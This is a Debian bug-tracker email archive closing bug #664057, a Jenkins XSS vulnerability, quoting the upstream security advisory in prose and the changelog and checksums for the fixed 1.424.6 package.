Bug#664057: marked as done (jenkins: XSS security vulnerability)

Debian Bug Tracking System Tue, 27 Mar 2012 05:22:43 -0700

Your message dated Tue, 27 Mar 2012 12:17:48 +0000
with message-id <[email protected]>
and subject line Bug#664057: fixed in jenkins 1.424.6+dfsg-1
has caused the Debian Bug report #664057,
regarding jenkins: XSS security vulnerability
to be marked as done.


This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
664057: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=664057
Debian Bug Tracking System
Contact [email protected] with problems

--- Begin Message ---

Package: jenkins
Version: 1.424.3+dfsg-1
Severity: normal
Tags: upstream

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-03-05

This advisory announces a couple of critical security vulnerabilities 
that were found in Jenkins core.

The first vulnerability is a directory traversal vulnerability. This allows 
an anonymous attacker to read files in the file system that shouldn't be 
exposed. 
This vulnerability affects Jenkins that run on Windows, whether or not the 
access control in Jenkins is enabled. Those file reads are still subject to 
OS-level access control, and therefore an attacker will only gain access to 
files 
that are readable to the OS user that runs the Jenkins process. This is a 
vulnerability in the built-in servlet container (named Winstone), and therefore 
the only affected users are those who are running Jenkins via 
java -jar jenkins.war (this includes users of the Windows installer.) 

This vulnerability affects all versions of Jenkins up to and including 1.452, 
and LTS releases up to and including 1.424.3.

The second vulnerability is a cross-site scripting (XSS) vulnerability, 
which allows an attacker to inject malicious HTMLs to pages served by Jenkins. 
This allows an attacker to escalate his privileges by hijacking sessions of 
other users. This vulnerability affects all versions of Jenkins up to and 
including 1.452, and LTS releases up to and including 1.424.3, regardless 
of the security settings.

Debian package is only impacted by the second vulnerability and requires a
new package - owasp-java-html-sanitizer (see 
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=664055).

This is also being address in Ubuntu which is nearing beta-2 for precise:

https://bugs.launchpad.net/ubuntu/+source/jenkins/+bug/954960


- -- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-18-generic (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBCAAGBQJPYcfqAAoJEL/srsug59jDdScQAKCBO5Dnxq/lonWKebhswIEt
p+kLi+JvBqRp0xKwpZIu1P235TEOOvKQPfgCAJj/8Uzsi1qB1t28100cYf/SOiZ/
phjpqtJ6tepxkTU4g/MMJb1hgkBpz/Cyit5JM+pZQ35kNWwFpCHf0kwZs51zHJyn
yGT0P0o0xaQkWjBjYnIbGeaklmyTa99YLcnvdt4u5NelIbj/eaBuJ7Y+nCpebjIP
o5V8LECTt2+YD54IoAAOTBwiK31v8/XgIL1D1nxOBMr9Kx5yXOVgzi5qdhrvfydT
tQA1+L/3Pada3rS4YqcEN04FF6m9iDYkzrhSuBOQML6dVIm8L0bCsf1Kp3VM0rMV
2j+fTF8HLqp8GUFmlRsd68DuTW6axZL/xHy5Ohh7vW+AhPcdlxKzNKCwnMA6HfIY
sVDS+fFhDYwLdqWgWw52bmqCO1MfY8mRZgpaxLd7j6PMGGZcchbhQ+/AYnTrU0cr
b0Z7YfyY80BU2rX61MsASwyFgdjuDNEGU+nNDgW1W3y6lJF64cyWAg+2E3kwLl9m
h2/0y/XoXRUWLu73lezl4ZHYSbE4P0x1zu2Xjm+Qjco1L9RmtsShc1YssXfD4OGC
aj7pAOxUSaXj01Q5890odCoIoGm1wCMHrohsJEMVWFIdjQMvKkvKumlHy4zZchmo
SM6YhUpIcTle9zDaVTxo
=tKqK
-----END PGP SIGNATURE-----

--- End Message ---

--- Begin Message ---

Source: jenkins
Source-Version: 1.424.6+dfsg-1

We believe that the bug you reported is fixed in the latest version of
jenkins, which is due to be installed in the Debian FTP archive:

jenkins-cli_1.424.6+dfsg-1_all.deb
  to main/j/jenkins/jenkins-cli_1.424.6+dfsg-1_all.deb
jenkins-common_1.424.6+dfsg-1_all.deb
  to main/j/jenkins/jenkins-common_1.424.6+dfsg-1_all.deb
jenkins-external-job-monitor_1.424.6+dfsg-1_all.deb
  to main/j/jenkins/jenkins-external-job-monitor_1.424.6+dfsg-1_all.deb
jenkins-slave_1.424.6+dfsg-1_all.deb
  to main/j/jenkins/jenkins-slave_1.424.6+dfsg-1_all.deb
jenkins-tomcat_1.424.6+dfsg-1_all.deb
  to main/j/jenkins/jenkins-tomcat_1.424.6+dfsg-1_all.deb
jenkins_1.424.6+dfsg-1.debian.tar.gz
  to main/j/jenkins/jenkins_1.424.6+dfsg-1.debian.tar.gz
jenkins_1.424.6+dfsg-1.dsc
  to main/j/jenkins/jenkins_1.424.6+dfsg-1.dsc
jenkins_1.424.6+dfsg-1_all.deb
  to main/j/jenkins/jenkins_1.424.6+dfsg-1_all.deb
jenkins_1.424.6+dfsg.orig.tar.gz
  to main/j/jenkins/jenkins_1.424.6+dfsg.orig.tar.gz
libjenkins-java_1.424.6+dfsg-1_all.deb
  to main/j/jenkins/libjenkins-java_1.424.6+dfsg-1_all.deb
libjenkins-plugin-parent-java_1.424.6+dfsg-1_all.deb
  to main/j/jenkins/libjenkins-plugin-parent-java_1.424.6+dfsg-1_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
James Page <[email protected]> (supplier of updated jenkins package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Tue, 27 Mar 2012 09:17:51 +0100
Source: jenkins
Binary: libjenkins-java libjenkins-plugin-parent-java jenkins-common jenkins 
jenkins-slave jenkins-external-job-monitor jenkins-cli jenkins-tomcat
Architecture: source all
Version: 1.424.6+dfsg-1
Distribution: sid
Urgency: low
Maintainer: Debian Java Maintainers 
<[email protected]>
Changed-By: James Page <[email protected]>
Description: 
 jenkins    - Continuous Integration and Job Scheduling Server
 jenkins-cli - Jenkins CI Command Line Interface
 jenkins-common - Jenkins common Java components and web application
 jenkins-external-job-monitor - Jenkins CI external job monitoring
 jenkins-slave - Jenkins slave node helper
 jenkins-tomcat - Jenkins CI on Tomcat 6
 libjenkins-java - Jenkins CI core Java libraries
 libjenkins-plugin-parent-java - Jenkins Plugin Parent Maven POM
Closes: 664057
Changes: 
 jenkins (1.424.6+dfsg-1) unstable; urgency=low
 .
   * New upstream release, fixing XSS security vulnerability (Closes: #664057):
     - d/control: Add new dependency on libowasp-java-html-sanitizer-java.
     - d/maven.rules: Add new rule to use artifacts
       from libowasp-java-html-sanitizer-java.
   * Switch upstart configurations to use start-stop-daemon to allow
     desktop systems to shutdown.
   * d/jenkins-slave.upstart.in: Ensure /var/run/jenkins exists before
     trying to download the jenkins slave.jar file to it.
     Thanks to Al Stone for providing this fix.
Checksums-Sha1: 
 ba6791a2b60e8b07a751a9578dbad08723017205 4374 jenkins_1.424.6+dfsg-1.dsc
 f2d10efcf5bb7faefcb50bf011b1b3f53a1f96d2 3812074 
jenkins_1.424.6+dfsg.orig.tar.gz
 f43121a30988acc77d664fe21aa996abdf4fcf19 39504 
jenkins_1.424.6+dfsg-1.debian.tar.gz
 68456e6f0a09506084817e7978f30bb835ae3761 5522472 
libjenkins-java_1.424.6+dfsg-1_all.deb
 d51ff5ffcba3dc3f7e1adf9dd863f030a6c0a6d2 13812 
libjenkins-plugin-parent-java_1.424.6+dfsg-1_all.deb
 218fa1c451e51707b00adbc84ad36467943fe8cc 30756438 
jenkins-common_1.424.6+dfsg-1_all.deb
 c10d68fbe48e34913e7209afdcbc190ac9a6e8e9 17908 jenkins_1.424.6+dfsg-1_all.deb
 8bf81b8a976f812dd343c4370898011eaf9e778b 16972 
jenkins-slave_1.424.6+dfsg-1_all.deb
 991719b5f5cf0a8d88d46e31424bf05f7b3525d2 5495970 
jenkins-external-job-monitor_1.424.6+dfsg-1_all.deb
 a89f1b89741f80669c9e976a4d2ecebf91ee2661 545486 
jenkins-cli_1.424.6+dfsg-1_all.deb
 54219def11a7721925ab710653b9ed61e565d9e7 13998 
jenkins-tomcat_1.424.6+dfsg-1_all.deb
Checksums-Sha256: 
 04d9f6f352325bea6b329bd28392cc1ced0e008183021582e49f6f7574621ad1 4374 
jenkins_1.424.6+dfsg-1.dsc
 d9effb49adce7814658a552cf46bc12ec40856264a2d145f464799736f8e5d01 3812074 
jenkins_1.424.6+dfsg.orig.tar.gz
 856de806e075d9945720b004ec4d5c7f5beee769ea248fb09bcc121cafb55ca6 39504 
jenkins_1.424.6+dfsg-1.debian.tar.gz
 11dae27ae45a26ce77c0e47fc5f388f1ac38e463f7c1cffe385b55d517730fab 5522472 
libjenkins-java_1.424.6+dfsg-1_all.deb
 89a45ae3c438c7e5fac5e22f1d859b0d1b7b262b6543ffdb0ceb256a83194ca2 13812 
libjenkins-plugin-parent-java_1.424.6+dfsg-1_all.deb
 15239b86b84bdb20e107b3af028bac8089a51c5d716823fbc6850ee6ef1d50b0 30756438 
jenkins-common_1.424.6+dfsg-1_all.deb
 316b079d8828bcbde51999009856e461f069f7c237992c9b66cf8516ae9ffd36 17908 
jenkins_1.424.6+dfsg-1_all.deb
 abde9e59552bc370c893d40dbba8ef288b9c79e1ca0caa8c8c3e61c914824686 16972 
jenkins-slave_1.424.6+dfsg-1_all.deb
 2660bf84353505f23597329c814819ab2e37f9022219175a1af6f0c6f24bde01 5495970 
jenkins-external-job-monitor_1.424.6+dfsg-1_all.deb
 01853d98fe4307ff7facc3e2ae1b4618aa1d6667a183783eda33c055aeb63a70 545486 
jenkins-cli_1.424.6+dfsg-1_all.deb
 a0c9acf1504f710a9157cbe199d8bf7e509a7e68d21ee4bbe5482829ba3b4cff 13998 
jenkins-tomcat_1.424.6+dfsg-1_all.deb
Files: 
 bb71287234e9013f4db7b4c91ff5d9ce 4374 java optional jenkins_1.424.6+dfsg-1.dsc
 6e1178315606e58701d28e0d6afaa0a0 3812074 java optional 
jenkins_1.424.6+dfsg.orig.tar.gz
 42f5a45ed3d96faa48c8ea9a1f0409af 39504 java optional 
jenkins_1.424.6+dfsg-1.debian.tar.gz
 3fe574c66cb26e822c6902a8d2e8dede 5522472 java optional 
libjenkins-java_1.424.6+dfsg-1_all.deb
 2aa76824e691e7fb67cd0f267a980b00 13812 java optional 
libjenkins-plugin-parent-java_1.424.6+dfsg-1_all.deb
 3e544ab0f2e09d804e624c4c3805557a 30756438 java optional 
jenkins-common_1.424.6+dfsg-1_all.deb
 f9e2b02661876d4b7abe775bbab01659 17908 java optional 
jenkins_1.424.6+dfsg-1_all.deb
 199b32102dbd0b7784a1591c6ae085d4 16972 java optional 
jenkins-slave_1.424.6+dfsg-1_all.deb
 cea94f39bcab40c65545fcf0ae8d31c6 5495970 java optional 
jenkins-external-job-monitor_1.424.6+dfsg-1_all.deb
 e06ed0bde45ce9d75d7b52737ccae63b 545486 java optional 
jenkins-cli_1.424.6+dfsg-1_all.deb
 bc559694b4dc994d9cb8764dadb28675 13998 java optional 
jenkins-tomcat_1.424.6+dfsg-1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iQIcBAEBCAAGBQJPcaewAAoJEL/srsug59jDoR0P/iLr3SZs4IV7x/h8LtSXEGIu
UVqxmdtpts2tr83Qrj/MIH7CPyStPm1XC8RvY2Jqqr7l3VXG2Qyuy9pqHwlCwKpk
Fs4TBsGayJBixCrzcnhs9iBUA/6WMkJ/jUnrIDyo7ZxjD3d+dvw+7QT5BVzBMRjC
hmgslGeEAEgbovqqLVUHr/dqXPol531eaHJvlm7n1JDIKU2I1RHAZ1/H6SoncWqF
b+zAzRAJa5f4UKCpHip0kVtOjWsWYbHuYeZdqAl/4D2LXE74mGfXy4riv3xuAN1c
tYw7U2CsKElLrRPJvCp4Rn+AYAFPlDPCEPu+XfPamY/5c7+INgs58c8hZIzEXh1F
zEyf1dDdf8Ucc01IliXgkN8FhlOIDqzqvs6Y6LlsjOKGCrmmThrMUqGDZ6NshVPQ
0O+bnPm2JAeUYxVAQz+V0SSngd7iRqjGEXm5SoRouqv0TCumOPdces1HBOdEGsW+
E43FAHgsCDtP4vjFwJQJuHkRtXfUXy9ZJbXkA9vPHpLSBZWgv8o6VGV77QdBUnd5
GlxNVL+UoFkjNxTJCCSvsw0lAj38+QuIJUMq7kFz1D5GzUe046O6B0mch/r31Peq
pSsXACVVxe1mBfaVyN0s35mj1ZAHA5wlcUqLlRb174vIuWSA0+LqXsKwHPm4Il8R
EQMlov0lSk9Xvr3Vdzt6
=yZYE
-----END PGP SIGNATURE-----

--- End Message ---

__
This is the maintainer address of Debian's Java team
<http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-java-maintainers>. 
Please use
[email protected] for discussions and questions.

Bug#664057: marked as done (jenkins: XSS security vulnerability)

Reply via email to